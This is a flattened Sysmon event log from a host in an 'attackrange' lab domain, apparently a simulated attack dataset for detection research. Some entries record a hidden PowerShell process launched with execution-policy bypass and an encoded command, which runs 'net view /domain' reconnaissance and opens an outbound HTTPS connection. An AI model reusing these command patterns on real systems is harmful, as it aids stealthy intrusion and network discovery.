18:14:44.611{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F14-613A-5790-03000000C801}4948C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\Sy
stem.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.616{B81B27B7-4F14-613A-5790-03000000C801}4948C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" view 
/domainC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e 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 23542300x800000000000000035085134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.563{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=349F6B5CD571E009F372CB2B4A9D1536,SHA256=EF40AD2EC2BDC382A976FC97A20C9882A2DBD83012CE4F2894D72D5AA874BFDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.562{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C90FE35C7C492EA6BB430D8FA8BF4D30,SHA256=72376994D9E51EA2B6CF0D4C7A44C91B13C272C803A621A7459161B32AC98944,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.380{B81B27B7-4F14-613A-5690-03000000C801}52121032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F14-613A-5690-03000000C801}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:44.243{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:44.243{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F14-613A-5690-03000000C801}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F14-613A-5690-03000000C801}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.228{B81B27B7-4F14-613A-5690-03000000C801}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59451F256A6B661889B1930B7A7F2E25,SHA256=9AEBB20880113EEED6BDE847DB7194714FAA83493D18C5BA60FAE1FCE1ECACBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:10.650{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-137netbios-nsfalse10.0.1.15win-host-987.attackrange.local137netbios-ns 354300x800000000000000035085158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.650{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-987.attackrange.local137netbios-nsfalse10.0.1.255-137netbios-ns 354300x800000000000000035085157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.650{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.15win-host-987.attackrange.local138netbios-dgm 354300x800000000000000035085156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.650{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-987.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 354300x800000000000000035085155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.619{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56701-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:45.719{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=349F6B5CD571E009F372CB2B4A9D1536,SHA256=EF40AD2EC2BDC382A976FC97A20C9882A2DBD83012CE4F2894D72D5AA874BFDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:45.633{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C64D6DE0E56C67260EE3683DD92C36A9,SHA256=87BB16051EC4DD84B18E8C65B3F2B8B4019D63160E9A8A99C5FC5187A1F7D3BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:45.226{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D35B5A82FFDB1621CBCA74FF5E20AA4B,SHA256=E469483403AC662EC3AC700C40136E857C43B8DB7968CA0CC56BD808B3A19E46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:46.233{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04784C3EC241476D534A268F0ED5B270,SHA256=B1C3B59F5ACB414C8D58C97A3777E872A534C67C533EBC89F67B2531CE89C442,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:47.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=273811949917521EEB125F8063D30944,SHA256=24A7E701B753378320A73D112FF2AEC22B4894859978E87097309E1D313F41E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:48.264{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEA08474D743F67090D6D266A64D5F67,SHA256=C0A4D2F55C67D72599F73BF7B644AC674BAC5D68AEA44C686F78EAB699047287,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:49.283{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80123AE7CBD4A4F9191FF2A8AF28984D,SHA256=E362FC89F65D2DE39674EC64681C1AA970C8092BC9EDB2C0A77E0E48B9C2BD1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:50.659{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.627{B81B27B7-4012-611D-1400-00000000C801}8841384C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:50.564{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.563{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:50.546{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.514{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
